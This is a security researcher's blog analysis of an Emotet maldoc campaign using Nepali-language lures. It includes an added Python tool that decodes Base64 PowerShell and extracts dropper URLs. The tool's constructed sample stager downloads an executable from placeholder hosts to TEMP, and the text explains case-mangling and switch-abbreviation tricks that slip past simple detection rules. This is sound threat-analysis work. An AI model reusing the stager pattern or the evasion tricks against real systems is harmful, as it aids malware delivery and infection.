Analysis: Emotet in Nepal

milann shrestha
4 min read · Sep 1, 2020


So this morning I saw a post by hiro_ about an Emotet doc in Nepali. Being a security researcher in Nepal, I was very keen to look at it, so I thought of writing a blog post about its basic static analysis.

Twitter Posts by hiro

I call it a campaign targeting a specific country. Previously, I have seen the Emotet actor targeting Japanese and Italian speakers. Likewise, this maldoc is crafted for Nepali speakers: the actor simply translated the usual lure word (“Invoice” or “Info”) into Nepali, i.e. “जानकारी” (“information”). The main highlight of this maldoc is the theme it carries and its specific target.

Opening the doc, it follows the latest template, introduced last week and nicknamed “red_dawn” after the red banner in the file. As usual, the Emotet gang wants the victim to click “Enable Content”, which runs the embedded VBA macro. You know the macro stuff. Let's do that.

Emotet Doc with red_dawn theme

Note: I am running these malicious files in VirtualBox as a sandbox, so I need not fear getting infected.

Monitoring the process tree with Procmon, we notice powersheLL.exe (PID 7388) launched with a huge encoded command line. The odd capitalisation of the image name is a common Emotet trick: Windows resolves the file name case-insensitively, so it runs fine, but a naive case-sensitive string match on “powershell.exe” misses it.

Tracking powershell.exe from procmon

Analyzing the values, the encoding is Base64; PowerShell's -EncodedCommand switch takes exactly this form, the Base64 of the UTF-16LE script text. Decoding gives the following still-obfuscated PowerShell script used to perform the malicious task. This obfuscation technique was first noticed last week here. Ivan (the Emotet operator) keeps changing it actively though.

Obfuscated powershell script

Cleaning up the junk from the above, we get the following full-fledged script.

Cleaned powershell script

The following obfuscation techniques are used:
* Declarations of random, unused variables,
* Random variable names,
* String concatenation where none is necessary,
* Use of Split() to build arrays dynamically,
* Heavy use of concatenation to assemble the URLs.

Thus, extracting the URLs from the cleaned script, we can list the following dropper links:
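The two steps just described, decoding the Base64 command line and undoing the concatenation and Split() obfuscation to recover the dropper URLs, as a worked example. This is added code, not from the original post or from the Emotet sample itself; the stager script, the command line and the .invalid/.test URLs inside it are constructed for illustration, and the -ENCOD switch and mixed-case image name are assumed to mirror the behaviour described above.

```python
"""Recover dropper URLs from an Emotet-style encoded PowerShell stager.

Added example, not code from the original post.  It follows the steps the
analysis describes: (1) take the Base64 blob off the powersheLL.exe command
line, (2) decode it (PowerShell's -EncodedCommand expects Base64 of UTF-16LE
text), (3) undo the string obfuscation (concatenation, redundant parentheses,
arrays built with Split()), (4) pull out the URLs.
The script and command line below are CONSTRUCTED for illustration and use
reserved .invalid/.test domains; they are not the real campaign's values.
"""
import base64
import re

# The switch may be any unambiguous prefix of -EncodedCommand (-e, -enc,
# -ENCOD, ...) and Windows matches the image name case-insensitively, so a
# rule keyed on the literal "powershell.exe -enc" misses real samples.
_ENC_CMD = re.compile(
    r"powershell(?:\.exe)?\"?.*?\s-e[a-z]*\s+(?P<b64>[A-Za-z0-9+/]{16,}={0,2})",
    re.IGNORECASE | re.DOTALL,
)
# 'ht' + 'tp'  or  ("a" + 'b'): two adjacent string literals glued with '+'
_CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")
# ('abc') -> 'abc', but not when '(' opens a call such as .Split('@')
_PARENS = re.compile(r"""(?<!\w)\(\s*(['"][^'"]*['"])\s*\)""")
# 'a@b'.Split('@') or ('a@b').Split('@') -> 'a' 'b'
_SPLIT = re.compile(
    r"""\(?\s*(['"])([^'"]*)\1\s*\)?\.Split\(\s*(['"])([^'"]*)\3\s*\)""",
    re.IGNORECASE,
)
_URL = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)


def decode_encoded_command(b64: str) -> str:
    """Reverse what powershell -EncodedCommand expects: Base64 over UTF-16LE."""
    return base64.b64decode(b64).decode("utf-16-le")


def deobfuscate(script: str) -> str:
    """Collapse concatenations and redundant parentheses to a fixpoint, then
    expand Split()-built arrays.  Split() is only handled once no more joins
    happen, otherwise a half-joined literal next to .Split( would be expanded
    too early and the array would lose elements."""
    prev = None
    while prev != script:
        prev = script
        script = _CONCAT.sub(lambda m: f"'{m.group(2)}{m.group(4)}'", script)
        script = _PARENS.sub(r"\1", script)
        if script == prev:  # joins are stable; now expand Split() arrays
            script = _SPLIT.sub(
                lambda m: " ".join(
                    f"'{part}'" for part in m.group(2).split(m.group(4) or None)
                ),
                script,
            )
    return script


def extract_urls(script: str) -> list[str]:
    """Unique URLs from the de-obfuscated script, in order of first appearance."""
    seen: set[str] = set()
    urls = []
    for url in _URL.findall(deobfuscate(script)):
        if url not in seen:
            seen.add(url)
            urls.append(url)
    return urls


def recover_urls(cmdline: str) -> list[str]:
    """Full chain: command line -> Base64 -> script -> cleaned script -> URLs."""
    match = _ENC_CMD.search(cmdline)
    if not match:
        return []
    return extract_urls(decode_encoded_command(match.group("b64")))


# Constructed stager in the style described in the post: junk variables,
# string concatenation everywhere, a URL list built via Split().
SAMPLE_SCRIPT = r"""$Mx7i = ('ht' + 'tp') + ('://' + 'news-update.invalid') + '/wp-admin/v5w/';
$Q_2 = ('http://cdn.shop.invalid/js/a9/@http://' + 'portal.example.test/cgi-bin/wX/').Split('@');
$Targets = @($Mx7i) + $Q_2;
foreach ($t in $Targets) {
  try { (New-Object Net.WebClient).DownloadFile($t, $env:TEMP + '\stage2.exe'); break } catch { }
}"""

# Constructed command line as the macro would launch it: mangled image-name
# case, hidden window, abbreviated -ENCOD switch, Base64(UTF-16LE) payload.
SAMPLE_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe" -w hidden -ENCOD '
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
)

if __name__ == "__main__":
    print(deobfuscate(decode_encoded_command(SAMPLE_CMDLINE.split()[-1])))
    for url in recover_urls(SAMPLE_CMDLINE):
        print(url)
```

Running the file prints the cleaned script followed by the three constructed dropper URLs. The Split() handling is what keeps the two URLs packed into one string from being merged into a single bogus URL, since “@” is a legal character in a URL's userinfo part.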


Letting Fiddler do its job (with the VM's network adapter turned off, so the requests fail but the attempts are still logged by the proxy), PowerShell tried to connect to the same list of URLs.

Collecting dropper link from fiddler (dynamic analysis)

The report from the AnyRun sandbox shows the following process graph, where two executables are dropped: J2meDvSHjK.exe and efsutill.exe.

Process Graph by Any Run

As mentioned, we get two executables which are in fact the same binary under a different path and name. On first execution the dropped file writes a copy of itself to a new path under a new name and then deletes the original. Imports from kernel32.dll such as CreateFile, DeleteFile, TerminateProcess and CreateThread certainly fit that behaviour.

Side by side comparison of two executable in CFF explorer

Executing the exe in my test environment, it sends POST requests to several of its C2 servers.

POST requests to C2 in Fiddler

MITRE ATT&CK® framework for mapping malware activity

Furthermore, mapping the sample's behaviour to the MITRE ATT&CK® framework (from the Hybrid Analysis report), we suspect the dropped malware could be an info-stealer.

To conclude, the Emotet actor has now started targeting Nepal with lures in the preferred language, Nepali. Interestingly, though, the malware carried by the maldoc seems to be the same family as before. Since Emotet's initial access is spear-phishing with sneaky methods such as hijacked email reply chains, the first line of defense is to treat any attachment (.doc, .xls, .pdf), link, or link-embedded picture from an unknown or unverified sender as suspicious. And since the malware dropped by the Emotet Trojan can lead to the top-tier cyber threat, ransomware, we must take this campaign seriously.

milann shrestha

security researcher / threat intel / osint / analyst / anti phishing